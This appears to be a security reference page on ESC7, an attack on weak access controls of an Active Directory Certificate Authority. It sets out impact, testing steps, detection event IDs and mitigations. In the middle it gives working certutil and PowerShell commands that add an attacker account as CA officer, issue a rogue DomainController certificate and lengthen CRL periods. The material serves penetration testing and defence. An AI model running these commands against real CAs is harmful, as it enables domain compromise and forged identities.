ESC7: Vulnerable Certificate Authority Access Control
ESC7 exploits weak access controls on the Certificate Authority itself, allowing attackers to directly manipulate CA operations and potentially compromise the entire PKI infrastructure.
ESC7 targets the access controls on the Certificate Authority (CA) itself. If these controls are weak or misconfigured, an attacker could potentially gain direct access to CA operations. This could allow them to issue unauthorized certificates, manipulate revocation lists, or even completely compromise the entire Public Key Infrastructure (PKI) of an organization.
Learn more about AD CS defense strategies to protect against this and other attacks.
- Unauthorized control over CA operations
- Issuance of unauthorized certificates
- Potential to stop or manipulate certificate revocation
- Complete loss of trust in the PKI infrastructure
- Identify vulnerabilities in CA access controls
- Exploit weak authentication or authorization mechanisms
- Gain unauthorized access to CA management interfaces
- Manipulate CA operations (e.g., issue rogue certificates, alter revocation lists)
When conducting AD CS penetration testing, consider the following aspects specific to ESC7: Vulnerable Certificate Authority Access Control:
- Identify vulnerable certificate templates and misconfigurations
- Assess the potential impact on the overall AD CS security
- Evaluate the effectiveness of existing security controls
- Test for the ability to exploit this vulnerability in the target environment
- Document findings and provide actionable remediation steps
Enumerate CA Permissions
certutil -config "CA_SERVER\CA_NAME" -securityGet-CertificateAuthority -ComputerName CA_SERVER | Get-CertificateAuthorityAclAdd a New CA Administrator
certutil -config "CA_SERVER\CA_NAME" -setreg "Security\Officers\AttackerAccount" 0x0fAdd-CertificateAuthorityCertificateOfficer -ComputerName CA_SERVER -CertificateAuthority CA_NAME -User "DOMAIN\AttackerAccount"Issue a Rogue Certificate
certreq -submit -attrib "CertificateTemplate:DomainController" -config "CA_SERVER\CA_NAME" request.infGet-Certificate -Template DomainController -CertStoreLocation Cert:\LocalMachine\MyManipulate CRL Settings
certutil -config "CA_SERVER\CA_NAME" -setreg CA\CRLPeriodUnits 52certutil -config "CA_SERVER\CA_NAME" -setreg CA\CRLPeriod "Weeks"- Implement comprehensive auditing for all CA operations
- Monitor for unusual activity on CA servers
- Use security information and event management (SIEM) tools to correlate CA-related events
- Regularly review access logs for CA management interfaces
- Implement anomaly detection for certificate issuance patterns
- 4882: The security permissions for Certificate Services changed
- 4870: Certificate Services revoked a certificate
- 4886: Certificate Services approved a certificate request
- 4887: Certificate Services denied a certificate request
To mitigate ESC7: Vulnerable Certificate Authority Access Control and enhance overall AD CS security, consider implementing the following measures:
- Implement strict access controls on CA servers and services
- Regular security audits of CA configurations
- Implement multi-factor authentication for CA management
- Use the principle of least privilege for CA administrators
- Implement robust logging and monitoring for all CA activities
- Regularly conduct AD CS penetration testing to identify and address vulnerabilities
- Implement the principle of least privilege across your AD CS infrastructure
- Maintain up-to-date documentation of your AD CS configuration and security policies
Related AD CS Attacks
Explore other attack vectors that target Active Directory Certificate Services:
